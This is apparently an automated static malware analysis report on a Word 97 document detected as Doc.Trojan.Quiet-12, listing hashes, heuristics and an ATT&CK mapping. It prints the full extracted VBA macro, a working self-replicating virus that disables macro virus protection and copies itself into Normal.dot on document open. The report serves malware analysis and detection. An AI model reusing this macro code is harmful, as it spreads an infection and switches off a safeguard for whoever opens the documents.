Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c7419b3473308c43…

MALICIOUS

Office (OLE)

26.0 KB Created: 2001-07-04 19:46:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ad64f6358465ef095c621291fbfcfecd SHA-1: 65df80ad7d777699466649ce21575c86c571214d SHA-256: c7419b3473308c432e539470c5750c6190e45716f133a9e4427bfcacf4789bb1
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros, specifically a Document_Open macro, which is designed to copy itself to the Normal.dot template. This action establishes persistence for the macro, allowing it to execute every time a new document is created. The ClamAV detection of 'Doc.Trojan.Quiet-12' further supports the malicious nature of this file.

Heuristics 3

  • ClamAV: Doc.Trojan.Quiet-12 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Quiet-12
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 946 bytes
SHA-256: 2e0f56dca3c9a959264ea5f3260094f86e7229c02071e4d08e8f31958d9ac178
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_Close()

End Sub

Private Sub Document_open()
 Application.Options.VirusProtection = False
 Set Source = ActiveDocument.VBProject.VBComponents.Item(1)
 Set dest = NormalTemplate.VBProject.VBComponents.Item(1)
 If dest.codemodule.CountOfLines = 0 Then
  For i = 1 To Source.codemodule.CountOfLines
     dest.codemodule.insertlines i, Source.codemodule.lines(i, 1)
  Next i
  Application.Options.SaveNormalPrompt = False
End If

If Source.codemodule.CountOfLines = 0 Then
 For i = 1 To dest.codemodule.CountOfLines
  Source.codemodule.insertlines i, dest.codemodule.lines(i, 1)
 Next i
 ActiveDocument.SaveAs (ActiveDocument.FullName)
 End If
End Sub